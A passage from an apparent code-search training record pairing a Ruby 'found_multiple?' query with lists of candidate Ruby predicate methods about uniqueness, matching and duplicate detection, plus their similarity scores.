"def opt_unique?(str)\n\texists = {}\n\tfor i in 0..str.length-1\n\t\tif exists[str[i]]\n\t\t\treturn false\n\t\telse\n\t\t\texists[str[i]] = true\n\t\tend\n\tend\n\ttrue\nend",
"def matched?( other = nil )\n return full? if other.nil?\n matches.include? other\n end",
"def unique?\n indexes.any?{|i| i.unique}\n end",
"def unique_key? object\n _check = self.find(object.key)\n _unique = !_check || _check != object\n end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def unique?\n false\n end",
"def expected_duplicate?(id)\n EXPECTED_DUPLICATES.include? id\n end",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def check_duplicates(str)\n current_user.movies.each do |movie|\n if movie.title == str\n return false\n end\n end\n end",
"def unique?\r\n @opts[:unique]\r\n end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def exact_match?\r\n warning.nil?\r\n end",
"def one_candidate?\n @candidates.count == 1\n end",
"def is_stable?\n # Every person's partner should match up\n @matches.all? { |k,v| is_matched?(k, v) }\n end",
"def more_than_once?(text, param, regex)\n count = text.scan(regex).size\n puts \"#{param}: #{count} time\"\n if count > 1\n puts \"- ERROR: '#{param}' appears more than one time on the page.\"\n return true\n end\n false\nend",
"def uniq?(uniq)\n { 'false': false, 'true': true }[uniq.to_sym]\n end",
"def empty?\n matched.empty?\n end",
"def any_duplicates?\n return @any_duplicates if defined? @any_duplicates\n\n return @any_duplicates = false if @composition.allow_duplicates?\n\n @any_duplicates = @heroes_by_segment.any? do |map_segment_id, hero_ids|\n hero_ids.uniq.size != hero_ids.size\n end\n end",
"def is_duplicate(name_str)\n schedules = @current_user.schedules.where(\"LOWER(schedules.name) LIKE LOWER(?)\", name_str).take\n if schedules && !@testing\n return true\n else\n return false\n end\n end",
"def is_a_match(total_in_common)\n total_in_common >= 2 ? true : false\n end",
"def uniquely_identified_by_any_peptides?\n unique_spectra > 0\n end",
"def unique?\n if @args[:data][:Index_type] == \"UNIQUE\"\n return true\n else\n return false\n end\n end",
"def unique?(field)\n !multiple?(field)\n end",
"def first_letter_match\n @query[0] == @reference[0]\n end",
"def single?\r\n @headers[\"results\"].nil?\r\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def unique_hash_already_exists?\n return Entry.where(feed_id: self.feed_id, unique_hash: self.unique_hash).exists?\n end",
"def match_id_array_exists?(match_id_array)\n match_id_array.each do |match_id|\n return true if @matched_cells.has_key?(match_id)\n end\n end",
"def has?(arg)\n !!find(arg)\n end",
"def matches?(value)\n !!(value.to_s =~ MATCHER)\n end",
"def is_false_duplicate?\n payment_complete? && has_completed_duplicates?\n end",
"def unique_id?(h, id)\n h.at_css(\"[id='#{id}']\").one?\n end",
"def double?\n if self.id\n return true if self.torrent_url && Torrent.not_self(self.id).find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.not_self(self.id).find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.not_self(self.id).find_by_name(self.name)\n else\n return true if self.torrent_url && Torrent.find_by_torrent_url(self.torrent_url)\n return true if self.transmission_hash_string && Torrent.find_by_transmission_hash_string(self.transmission_hash_string)\n return true if self.name && Torrent.find_by_name(self.name) \n end\n \n \n return false\n end",
"def exact?\n @exact\n end",
"def unique?\n self[:unique] ? true : false\n end",
"def matched?(str)\r\n # puts \">>> #{self.matcher.source}\"\r\n # puts \">>> #{str}\"\r\n return false if (!self.implicit && str[0] != \"!\")\r\n if (self.matcher =~ str) != nil\r\n $bot.last_match = $~\r\n $log.info(\"/#{self.matcher.source}/ matched #{str}\")\r\n return true\r\n end\r\n false\r\n end",
"def is_match? cells\n\t\towners = []\n\n\t\tcells.each_with_index do |cell, i|\n\t\t\towners[i] = cell.name\n\t\tend\n\n\t\towners.uniq.length == 1\n\tend",
"def exact_match?\n search_settings = @settings['search']\n matching = search_settings.fetch('matching', 'pattern').normalize_matching\n matching == :exact\n end",
"def single_match(matches, request, command)\n\n if matches.length == 0\n Views::no_match_error \"projects\", request\n return false\n elsif matches.length > 1\n Views::ambiguous_project matches, command\n return false\n else\n match = matches[0]\n end\n end",
"def repeated_name?()\n sql = \"SELECT * FROM spellbooks\n WHERE name = $1\"\n values = [@name]\n result = SqlRunner.run(sql, values)\n return true if result.first != nil && result.first['id'].to_i != @id\n return false\n end",
"def exists?\n !count.zero?\n end",
"def duplications?\n size != uniq.size \n end",
"def unique_flag_negative?\n found_unique? ? @flags.first[2] : nil\n end",
"def found_multiple?\n @flags.size > 1\n end",
"def match?(name); end",
"def multiple_match?\n acknowledgement_detail = locate_element(@original_body, ACKNOWLEDGEMENT_DETAIL_XPATH)\n return false unless acknowledgement_detail\n\n acknowledgement_detail.nodes.first == MULTIPLE_MATCHES_FOUND\n end",
"def unique(answer)\n\tanswer.split(\"\").each do |n|\n\t\treturn false if answer.count(n) > 1\n\tend\n\ttrue\nend",
"def seen?(word)\n length = word.length\n\n (@seen.has_key?(length) && @seen[length].include?(crc32(word)))\n end",
"def any_results?\n races.any?(&:any_results?)\n end",
"def object?\n marc_leader_06_r_match = record.leader.byteslice(6) == 'r'\n\n marc_leader_06_e_match = record.leader.byteslice(6) == 'e'\n marc_008_25_match = record.fields('008').find do |field|\n field.value.byteslice(25) == 'd'\n end\n\n marc_006_match = record.fields('006').find do |field|\n field.value.byteslice(0) == 'r' ||\n field.value.byteslice(8) == 'd'\n end\n\n marc_007_match = record.fields('007').find do |field|\n field.value.byteslice(0) == 'd'\n end\n\n return true if marc_leader_06_r_match ||\n (marc_leader_06_e_match && marc_008_25_match) ||\n marc_006_match ||\n marc_007_match\n end",
"def matched?(other_user)\n matched.include?(other_user)\n end",
"def result?\n !@result.equal?(NOT_SET)\n end",
"def match?(id, email)\n return true unless authenticated? #always match on \"all\" group\n return false if id == GROUP_ALL_URI # all does not match anything\n id == identifier || email == identifier\n end",
"def exists?\n return id.to_s =~ /\\d+/\n end",
"def occur_once?(featured_number)\n num_string = featured_number.to_s\n num_array = num_string.split('')\n num_array.none? { |num| num_string.count(num) > 1 }\nend",
"def unique?(name)\n envs = find(name)\n envs.size == 1\n end",
"def is_match?(value)\n\t\t\tpattern_groups = group_patterns\n\t\t\tif pattern_groups[:negatives].empty?\n\t\t\t\tnegatives = true\n\t\t\telse\n\t\t\t\tnegatives = pattern_groups[:negatives].all? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\tif pattern_groups[:positives].empty?\n\t\t\t\tpositives = true\n\t\t\telse\n\t\t\t\tpositives = pattern_groups[:positives].any? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\treturn false if pattern_groups[:positives].empty? && pattern_groups[:negatives].empty?\n\t\t\treturn positives && negatives\n\t\tend",
"def row_exists?(unique_identifier)\n wait_for_results\n exists? result_row(unique_identifier)\n end",
"def row_exists?(unique_identifier)\n wait_for_results\n exists? result_row(unique_identifier)\n end",
"def exact?\n !!@repeat\n end",
"def first?\n\t locate == 1\n\tend",
"def find?(word)\n !find(word).empty?\n end",
"def is_unique\n return true if fact_type.is_a?(LinkFactType) or # Handle objectification roles\n fact_type.all_role.size == 1 # and unary roles\n\n uniqueness_constraint ? true : false\n end",
"def is_one_pair?\n repetitions(2).keys.count == 1\n end",
"def exist?\n !count.zero?\n end",
"def full_house?\n matched = self.matched_cards\n found_pair = false\n found_three = false\n for rank, matches in matched do\n found_pair = true if matches.count == 2\n found_three = true if matches.count == 3\n end\n return found_pair && found_three \n end",
"def matches?(other)\n self.exists? && other.exists? && self.hash == other.hash\n end",
"def has_been_proposed?(person)\n @matches.each do |_,v|\n return true if v == person\n end\n false\n end"
] | [
"0.6884946",
"0.6743467",
"0.66666603",
"0.6646708",
"0.6625602",
"0.6497823",
"0.6478675",
"0.64102274",
"0.6392388",
"0.6372588",
"0.6372588",
"0.6372588",
"0.6364799",
"0.6364799",
"0.6321445",
"0.6251311",
"0.624624",
"0.61834055",
"0.6135826",
"0.61332864",
"0.6130879",
"0.6125903",
"0.6114986",
"0.61142695",
"0.6096608",
"0.60944927",
"0.60813457",
"0.60811627",
"0.6062501",
"0.60576344",
"0.6057611",
"0.6054877",
"0.6018599",
"0.60000753",
"0.59957504",
"0.59862137",
"0.5968593",
"0.59660685",
"0.59657377",
"0.5953032",
"0.5906937",
"0.5901133",
"0.5897711",
"0.5897711",
"0.5891927",
"0.58864254",
"0.58844113",
"0.5882316",
"0.58713305",
"0.5860993",
"0.5858116",
"0.5849646",
"0.58378035",
"0.58296776",
"0.5826915",
"0.58267874",
"0.5826145",
"0.5823682",
"0.5815498",
"0.5805555",
"0.57806575",
"0.5778354",
"0.57763994",
"0.5770581",
"0.5765877",
"0.57575905",
"0.574654",
"0.5746481",
"0.57456374",
"0.573384",
"0.5732977",
"0.5726564",
"0.5722463",
"0.57123",
"0.57100976",
"0.57033145",
"0.56834966",
"0.5683094",
"0.56768095",
"0.5659092",
"0.56561106",
"0.56454396",
"0.5634761",
"0.56323075",
"0.5624714",
"0.56220484",
"0.562055",
"0.5614543",
"0.5597641",
"0.55872196",
"0.55872196",
"0.5587015",
"0.5581552",
"0.5574121",
"0.5571467",
"0.557091",
"0.55690634",
"0.5557305",
"0.5553822",
"0.55520374"
] | 0.74470997 | 0 |
Whether no matches were found. | def not_found?
@flags.empty?
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def empty?\n matched.empty?\n end",
"def nothing_found?\n @matching_documents.nil? or @matching_documents.entries.empty?\n end",
"def nil?\n @matches.nil?\n end",
"def matched?\n not @match.equal?(nil)\n end",
"def matched?\n !failed?\n end",
"def expects_none?\n count_specified? ? matches_count?(0) : false\n end",
"def terminal?\n matches.length == 0\n end",
"def match?\n false\n end",
"def empty?\n self.results.empty?\n end",
"def hasResults?\n ! @results.empty?\n end",
"def results?() ! find(locator(:no_results_message)) end",
"def has_match?\n !match_x.nil? && !match_y.nil?\n end",
"def any_results?\n races.any?(&:any_results?)\n end",
"def nothingToSearch? \n\t\treturn $toSearch.empty? \n\tend",
"def has_results?\n true\n end",
"def any?\n false\n end",
"def no_results\n print \"0 results found. \\n\"\n end",
"def empty?\n qr_responses.blank? && sip_responses.blank?\n end",
"def empty?\n return @querys.empty?\n end",
"def empty?\n\t\treturn [ self.one_of, self.all_of, self.none_of ].all?( &:empty? )\n\tend",
"def free?\n matches.length < match_positions\n end",
"def __empty?\n all?(&:__empty?)\n end",
"def none?\n !any?\n end",
"def empty?\n count.zero?\n end",
"def empty?\n count.zero?\n end",
"def empty?\n count.zero?\n end",
"def success?\n return @stats.missing_tags.empty?\n end",
"def no_more?\n more_results == :NO_MORE_RESULTS\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def has_results?\n !(name == 'aggregate' &&\n pipeline.find {|op| op.keys.include?('$out') })\n end",
"def any?\n ! empty?\n end",
"def any?\n !total_pages.zero?\n end",
"def empty?\n return true unless @all\n @all.empty?\n end",
"def empty?\n count == 0\n end",
"def empty?\n count == 0\n end",
"def any?\n messages.count.positive?\n end",
"def empty?\n count <= 0\n end",
"def empty?\n count == 0\n end",
"def empty?\n all.empty?\n end",
"def empty?\n questions.empty? and\n answers.empty? and\n nameservers.empty? and\n additional_records.empty?\n end",
"def any?\n not blank?\n end",
"def matches(value)\n output, status = provider.run_unless_sql_command(value)\n output='0' unless status == 0\n\n result_count = output.strip.to_i\n self.debug(\"Found #{result_count} row(s) executing 'unless' clause\")\n result_count > 0\n end",
"def has_records? results\n not results.nil? and results.fetch('SearchResult', {}).fetch('Data', {}).fetch('Records', []).count > 0\n end",
"def empty?\n RECORDS.each do |name, _|\n return false unless @records[name].empty?\n end\n true\n end",
"def empty?\n filter.empty?\n end",
"def empty?\n return @records.empty? if loaded?\n\n c = count\n c.respond_to?(:zero?) ? c.zero? : c.empty?\n end",
"def result?\n !@result.equal?(NOT_SET)\n end",
"def not_found?\n has_errors? && !not_found_errors.empty?\n end",
"def empty?\n @count == 0\n end",
"def empty?\n @count == 0\n end",
"def empty?\n @count == 0\n end",
"def empty?\n @count == 0\n end",
"def empty?\n total_count == 0\n end",
"def empty?\n total_count == 0\n end",
"def empty?\n rules.empty?\n end",
"def has_response?\n if @answers.nil? then\n false\n else\n rc = false\n @answers.each do |answer| # loop through Answers\n if !answer.value.blank? then # any response is good enough\n rc = true\n break\n end\n end\n rc\n end\n end",
"def no_questions_matches_no_answers?\n num_questions = question_ids.length\n pre_fetched_answers = Answer\n .includes({ question: :question_format }, :question_options)\n .where(id: answer_ids)\n num_answers = pre_fetched_answers.reduce(0) do |m, a|\n if a.is_valid? \n m+=1\n end\n m\n end\n return num_questions == num_answers\n end",
"def empty?\n count.zero?\n end",
"def none?\n @value.to_s.empty? or /\\Anone\\z/io.match(@value.to_s)\n end",
"def empty?\n @records.empty?\n end",
"def empty?()\r\n\t\t@bottles.zero?\r\n\tend",
"def empty?\n @rules.empty?\n end",
"def no_missing?(values)\n not(any_missing?(values))\n end",
"def empty?\n self.responses.empty?\n end",
"def test_emptySkill\n f = SkillFilter.new()\n new_list = [].find_all{|x| f.apply(x)}\n return new_list.size == 0\n end",
"def any_oranges?\n @oranges.length > 0\n end",
"def any_oranges?\n @oranges.length > 0\n end",
"def any?\n !empty?\n end",
"def any?\n !empty?\n end",
"def similarities?\n !similarities.empty?\n end",
"def matches?(rendered)\n @rendered = rendered\n @failures = matchers.reject do |matcher|\n matcher.matches?(rendered)\n end\n\n @failures.empty?\n end",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def vulnerable?\n !@results.empty?\n end",
"def empty?\n return (@indexes.empty? and @segments_metadata.empty?)\n end",
"def found?\n return false if no_search\n\n id.present? || records.present?\n end",
"def empty?\n @exact.empty? && @list.empty?\n end",
"def exam_and_interview_result_exists\n !exam_result.blank? and !interview_result.blank?\n end",
"def empty?\n @total == 0\n end",
"def empty?\n return false\n end",
"def empty?\n record_count == 0\n end",
"def get_results\n # 1. if the search is blank do NOT run the search (handled in subclasses)\n !self.search_text.blank? && !self.search_query.blank? && !self.search_type.blank? && !self.search_locale.blank?\n end",
"def failed?\n solutions.empty?\n end",
"def empty?() end",
"def empty?() end",
"def empty?() end",
"def none_empty?\n !any_empty?\n end",
"def none_empty?\n !any_empty?\n end",
"def empty?\n _values.all?(&:empty?)\n end",
"def no_products_found_msg?\n msg_vis = get_el(doc.css(\"#outsidecontainer\"))\n return false unless msg_vis and msg_vis.css('@style').to_s.match(/display: inline/)\n msg = get_text(doc.css(\"#outsidecontainer #info\"))\n return true if (msg || '').match(/no matching results/i)\n return false\n end",
"def empty?\n self.count == 0\n end",
"def empty?\n self.count == 0\n end",
"def passed?\n results.each { |re| return false unless re[:passed] }\n true\n end",
"def matches\n @matches ||= []\n end",
"def check_for_no_results(hash_of_results)\n if hash_of_results[JSON_NUMBER_OF_RESULTS] == 0\n puts 'No results, try again'\n go\n end\n end",
"def blank?\n raw_response.blank? || total < 1\n end",
"def queries_empty? queries\n queries.blank?\n end",
"def empty?\n graph.query({subject: subject, predicate: RDF.first}).empty?\n end",
"def any_questions?\n @questions.length > 0\n end",
"def empty?\n false\n end",
"def present?\n results.any?\n end"
] | [
"0.7834877",
"0.7826205",
"0.75819826",
"0.74592906",
"0.7218907",
"0.71993864",
"0.7182467",
"0.7114309",
"0.70080775",
"0.69820714",
"0.671407",
"0.65172404",
"0.650716",
"0.64751863",
"0.6457733",
"0.642819",
"0.6427544",
"0.64200985",
"0.64139336",
"0.6396393",
"0.63804966",
"0.63661563",
"0.6340611",
"0.63133895",
"0.63133895",
"0.63133895",
"0.62927985",
"0.628693",
"0.62863725",
"0.62844634",
"0.62625",
"0.624944",
"0.62385464",
"0.6222769",
"0.6222769",
"0.62189496",
"0.6199322",
"0.6190134",
"0.6182571",
"0.6161559",
"0.6138808",
"0.61327845",
"0.61186945",
"0.6117039",
"0.6113573",
"0.6110668",
"0.6091368",
"0.60840553",
"0.6083817",
"0.6083817",
"0.6083817",
"0.6083817",
"0.60817784",
"0.60817784",
"0.6081573",
"0.60599303",
"0.6056511",
"0.6055926",
"0.6052334",
"0.6045073",
"0.6043733",
"0.60427135",
"0.603981",
"0.6038412",
"0.6033105",
"0.6032122",
"0.6032122",
"0.60304046",
"0.60304046",
"0.6028917",
"0.60288113",
"0.6026575",
"0.6022024",
"0.60170555",
"0.60163176",
"0.6008035",
"0.6007184",
"0.60068566",
"0.5994522",
"0.5987648",
"0.597834",
"0.597829",
"0.5976505",
"0.5976505",
"0.5976505",
"0.5952705",
"0.5952705",
"0.5950863",
"0.5941015",
"0.5939502",
"0.5939502",
"0.5938266",
"0.59377766",
"0.5936189",
"0.59350806",
"0.5930168",
"0.5929696",
"0.59192365",
"0.5914358",
"0.5911903"
] | 0.6741005 | 10 |
Whether multiple matches were found (i.e. ambiguous input). | def found_multiple?
@flags.size > 1
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def match?(given_names); end",
"def matched?( other = nil )\n return full? if other.nil?\n matches.include? other\n end",
"def multiple_search?\n\t\t@attempts > 1\n\tend",
"def multiple_match?\n acknowledgement_detail = locate_element(@original_body, ACKNOWLEDGEMENT_DETAIL_XPATH)\n return false unless acknowledgement_detail\n\n acknowledgement_detail.nodes.first == MULTIPLE_MATCHES_FOUND\n end",
"def multiple?(term)\n self.class.multiple?(term)\n end",
"def is_a_match(total_in_common)\n total_in_common >= 2 ? true : false\n end",
"def matches?(*)\n # by default nothing matches\n nil\n end",
"def match_args(results, queries)\n queries.map do |query|\n (results.any? { |r| r.to_s.match(query) } ? 1 : nil)\n end.compact\n end",
"def match_all?\n self.class.array_matching == :all\n end",
"def maybe_matching(ingredient_long_name,item)\n return (item.downcase.split(\" \") & ingredient_long_name.split(\" \")).size >= 1\nend",
"def term_multiple?( term )\n #puts \"=====> GenericWork.term_multiple? #{term}\"\n return true if [:keyword, :title, :contributor, :subject, :related_url, :sponsoring_agency, :admin_notes].include? term\n false\n end",
"def probable_matching(ingredient_long_name,item)\n return (item.downcase.split(\" \") & ingredient_long_name.split(\" \")).size >= 2\nend",
"def match?(metadata)\n @matches.each do |match|\n if filter_select(match, metadata) and !match.negate\n return true\n end\n if filter_select(match, metadata) and match.negate\n return false\n end\n end\n false\n end",
"def is_multimatch(s)\n return s.match(/[*?]/)\n end",
"def matched?\n !failed?\n end",
"def several?\n several = (count > 1) if several.nil?\n end",
"def exact_matches(guess)\n pegs.zip(guess.pegs).count { |a, b| a == b }\n end",
"def accept_multiple_sets?\n return true\n end",
"def found_exact?\n @found_exact\n end",
"def is_wanted?(match_all = false)\n # puts \"Checking if item is wanted.\"\n wants_count = 0\n match_count = 0\n\n self.attrs.each do |attr|\n if (!attr[:want].nil?)\n # puts \"Want value(s) specified on #{attr[:title]} (#{attr[:value]}): #{attr[:want]}\"\n wants_count += 1\n\n attr[:want].each do |want_val|\n # If the value is quoted, match it exactly.\n if ((want_val[0] == '\"') ||\n (want_val[0] == \"'\"))\n quote = want_val[0]\n if (want_val[(want_val.length - 1)] == quote)\n # puts \"Value #{want_val} is quoted.\"\n if (attr[:value].downcase == want_val[1..(want_val.length - 2)].downcase)\n # puts \"Matches.\"\n match_count += 1\n else\n # puts \"Doesn't match.\"\n end\n elsif (attr[:value].downcase.include?(want_val.downcase))\n # puts \"Matches (loose / 1).\"\n match_count += 1\n else\n # puts \"Doesn't match.\"\n end\n elsif (attr[:value].downcase.include?(want_val.downcase))\n # puts \"Matches (loose / 2).\"\n match_count += 1\n end\n end\n end\n end\n\n # puts \"Wanted? #{wants_count} & #{match_count}\"\n if match_all\n return (wants_count == match_count)\n else\n return ((wants_count == 0) || (match_count > 0))\n end\n end",
"def matches?\n symbol = @actual.is_a?(Symbol)\n actual = symbol ? @actual.to_s : @actual\n values = symbol ? @values.map { |v| v.is_a?(Symbol) ? v.to_s : v } : @values\n\n values.each do |value|\n return false unless actual.include?(value)\n end\n\n true\n end",
"def exact_match?\n !partial_match?\n end",
"def exact_match?(arguments, keyword_arguments)\n definition.exact_match?(arguments, keyword_arguments)\n end",
"def multiple?; end",
"def matching?(word_to_match)\n anagram?(word_to_match) && !words_the_same?(word_to_match)\n end",
"def matches?(candidates)\n candidates.any? && candidates.all? { |l| @languages.include?(l.name) }\n end",
"def exact_matches\n matches = 0\n 4.times{ |x| matches += 1 if @num_guess[x] == @code[x] }\n matches\n end",
"def matches(smarts_or_string, uniq=true)\n each_match(smarts_or_string, uniq).map.to_a\n end",
"def multiple?\n @multiple\n end",
"def is_match?(value)\n\t\t\tpattern_groups = group_patterns\n\t\t\tif pattern_groups[:negatives].empty?\n\t\t\t\tnegatives = true\n\t\t\telse\n\t\t\t\tnegatives = pattern_groups[:negatives].all? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\tif pattern_groups[:positives].empty?\n\t\t\t\tpositives = true\n\t\t\telse\n\t\t\t\tpositives = pattern_groups[:positives].any? { |x| is_single_match?(x, value) }\n\t\t\tend\n\n\t\t\treturn false if pattern_groups[:positives].empty? && pattern_groups[:negatives].empty?\n\t\t\treturn positives && negatives\n\t\tend",
"def verb_correct? set\n (set & VERBS).count >= 1\n end",
"def all_words_valid? set\n (set & DICTIONARY) == set\n end",
"def match?(*token_types)\n token_types.each do |type|\n if check?(type)\n advance\n return true\n end\n end\n\n return false\n end",
"def validate_matches\n return success unless (@matched_ids.present? || @unmatched_ids.present?)\n\n # common ids in matches_ids and unmatched_ids\n r = validate_matched_unmatched_records\n return r unless r.success?\n\n success\n\n end",
"def check_repeated_choice guess\r\n\t\t\t\t\t@resultb.include? guess\r\n\t\t\t\tend",
"def multiple?(field_key)\n true\n end",
"def match?\n false\n end",
"def define_match_any_of\n klass.send(:define_method, :match_any_of) do |tags|\n if tags.empty?\n str(\"\")\n else\n tags.map { |tag| str(tag) }.inject do |tag_chain, tag|\n tag_chain.send :|, tag\n end\n end\n end\n end",
"def match_array(input)\n case input\n in [a, b, c]\n \"matching - #{a}, #{b}, #{c}\"\n else\n \"no match\"\n end\nend",
"def full_house?\n matched = self.matched_cards\n found_pair = false\n found_three = false\n for rank, matches in matched do\n found_pair = true if matches.count == 2\n found_three = true if matches.count == 3\n end\n return found_pair && found_three \n end",
"def supports_multiple?(type)\n rules_for_type(type).include?(:multiple)\n end",
"def matches?(actual)\n @matching_values.include?(actual)\n end",
"def allwords?\n vowels = 'aeiouy'\n words1 = @input1.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\" \")\n words2 = @input2.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\" \")\n if\n words1.all? {|str| str.count(vowels) >= 1} && words2.all? {|str| str.count(vowels) >= 1}\n return true\n else\n return \"You need to input actual words!\"\n end\n end",
"def tag_match_found(option_tags, aws_tags)\n option_tags.each do | option_tag |\n aws_tags.each do | aws_tag | \n if option_tag[:key].downcase == aws_tag[:key].downcase and option_tag[:value].downcase == aws_tag[:value].downcase\n return true\n end\n end\n end\n\n return false\nend",
"def use_multiple?(results)\n if(results.class.to_s == 'Array' && results[0].class.superclass.to_s == 'ActiveRecord::Base')\n return true\n end\n false\n end",
"def one_result\n matched_combined = @matched_names.ids + @matched_tags.ids +\n @matched_queries.ids + @matched_creator.ids +\n @matched_modifier.ids\n return Asq.find(matched_combined[0]) if matched_combined.length == 1\n false\n end",
"def got_three?(arr)\n !!(arr.map(&:to_s).join =~ /(.)\\1\\1/)\nend",
"def matches?(sequence)\n (0..(sequence.size-length)).each do |pos|\n return pos if matches_at?(pos, sequence)\n end\n return false\n end",
"def check?(input)\n\t\t@response_list.keys.any? do |to_match|\n\t\t\twords = to_match.split\n\t\t\twords.any? { |word| input.split.include? word }\n\t\tend\n\tend",
"def exact_matches(other_code)\n exact_matches = 0\n @seq.each_with_index do |letter, index|\n exact_matches += 1 if self.is_exact_match?(other_code, index)\n end\n exact_matches\n end",
"def match(*list)\n @match.concat(makelist(list)) unless list.empty?\n @match\n end",
"def winner?\n (self.array & [\"a1\",\"a2\",\"a3\"]).length == 3 || (self.array & [\"b1\",\"b2\",\"b3\"]).length == 3 || (self.array & [\"c1\",\"c2\",\"c3\"]).length == 3 || (self.array & [\"a1\",\"b1\",\"c1\"]).length == 3 || (self.array & [\"a2\",\"b2\",\"c2\"]).length == 3 || (self.array & [\"a3\",\"b3\",\"c3\"]).length == 3 || (self.array & [\"a1\",\"b2\",\"c3\"]).length == 3 || (self.array & [\"c1\",\"b2\",\"a3\"]).length == 3\n end",
"def my_all?(arg = nil)\n all_matched = true\n my_each do |val|\n if block_given?\n all_matched = false unless yield(val)\n elsif arg.nil?\n all_matched = false unless val\n else\n all_matched = false unless arg === val\n end\n end\n all_matched\n end",
"def check_input(input, values)\n input_ok = false\n values.each do |value|\n input_ok = true if input.include?(value)\n end\n return input_ok\nend",
"def ambiguous?\n found = chart.sets.find { |set| !set.ambiguities.empty? }\n !found.nil?\n end",
"def includes_all? *args\n args.all? { |arg| include? arg }\n end",
"def my_any? looking_for\n output = false\n self.my_each {|item| output = true if item == looking_for}\n output\n end",
"def match?(args)\n if @matchers.empty?\n @logger.log_if_debug('[CombiningMatcher] Matchers Empty')\n return false\n end\n\n case @combiner\n when Combiners::AND\n matches = eval_and(args)\n @logger.log_if_debug(\"[CombiningMatcher] Combiner AND result -> #{matches}\")\n return matches\n else\n @logger.log_if_debug(\"[CombiningMatcher] Invalid Combiner Type - Combiner -> #{@combiner}\")\n @logger.error('Invalid combiner type')\n end\n\n false\n end",
"def include_one_of?(other)\n unless other.collect {|string| true if self.include_string? string}.compact.blank?\n return true\n else\n return false\n end\n end",
"def two_candidates?\n @candidates.count == 2\n end",
"def include_any?(arr, arr2)\n #good for large sets w/ few matches\n # Set.new(self).intersection(arr).empty?\n arr2.any? {|e| arr.include?(e) }\n end",
"def member_of_group?(*names)\n @group_names && @group_names.intersect?(names.to_set) \n end",
"def any_of(*args)\n [:any_of, args]\n end",
"def isSet? card_arr\n return false if card_arr.size != 3\n color_arr = [card_arr[0][0], card_arr[1][0], card_arr[2][0]]\n shape_arr = [card_arr[0][1], card_arr[1][1], card_arr[2][1]]\n num_arr = [card_arr[0][2], card_arr[1][2], card_arr[2][2]]\n shade_arr = [card_arr[0][3], card_arr[1][3], card_arr[2][3]]\n same_or_dif?(color_arr) && same_or_dif?(shape_arr) && same_or_dif?(num_arr) && same_or_dif?(shade_arr)\nend",
"def pair_not_overlapping?\n !(self.match(/([a-z][a-z]).*\\1/)).nil?\n end",
"def tag_match?(tags, tag_patterns, last_only)\n if last_only\n tags.last.match(Regexp.new(tag_patterns.last))\n else\n return false if tags.count != tag_patterns.count\n all_match = true\n tags.each_with_index do |tag, i|\n unless tag.match(Regexp.new(tag_patterns[i]))\n all_match = false\n break\n end\n end\n all_match\n end\n end",
"def must_unify?(seq1, seq2)\n unique_selectors = seq1.map do |sseq|\n next [] if sseq.is_a?(String)\n sseq.members.select {|sel| sel.unique?}\n end.flatten.to_set\n\n return false if unique_selectors.empty?\n\n seq2.any? do |sseq|\n next false if sseq.is_a?(String)\n sseq.members.any? do |sel|\n next unless sel.unique?\n unique_selectors.include?(sel)\n end\n end\n end",
"def match(*token_types)\n token_types.each do |token_type|\n if check?(token_type)\n advance\n return true\n end\n end\n false\n end",
"def multiples?\n @maxOccurs == nil || 1 < @maxOccurs\n end",
"def match?(instance)\n match_id?(instance) || match_percentage?(instance) || match_groups?(instance)\n end",
"def one_match?(candidate_categories, result_age = nil)\n return false unless candidate_categories.one?\n\n candidate_category = candidate_categories.first\n match = candidate_category.include? self, result_age\n debug \"one_match? #{match}\"\n match\n end",
"def noun_articles_correct? set\n ((set & NOUNS).count >= 1) || ((set & ARTICLES).count >= 2)\n end",
"def any_results?\n races.any?(&:any_results?)\n end",
"def is_one_of?(*syms)\n syms.flatten.include?(to_sym)\n end",
"def check_three_and_two(arr)\n answer = Hash.new\n arr.each { |x| answer[x] = arr.count(x)}\n if answer.keys.count == 2 && (answer.values.include?(2) && answer.values.include?(3))\n p true\n else\n p false\n end\nend",
"def multiple?(type)\n (type.is_a?(Array) || type.is_a?(Set)) && type.size > 1\n end",
"def match?(choices)\n\n @choices = choices\n raise ArgumentError, 'Checker received non-card input' unless @choices.kind_of?(Array)\n raise ArgumentError, 'A set has 3 cards! Please select 3 cards!' unless @choices.size == 3\n\n # Logic: \"MAKE THIS TERSE\"\n numbers = Array.new(3) { |i| choices[i].number }\n symbols = Array.new(3) { |i| choices[i].symbol }\n shadings = Array.new(3) { |i| choices[i].shading }\n colors = Array.new(3) { |i| choices[i].color }\n\n features = [numbers, symbols, shadings, colors]\n @result = features.all? { |feature| feature.uniq.size != 2 }\n end",
"def multiple?(field)\n self.class.multiple?(field)\n end",
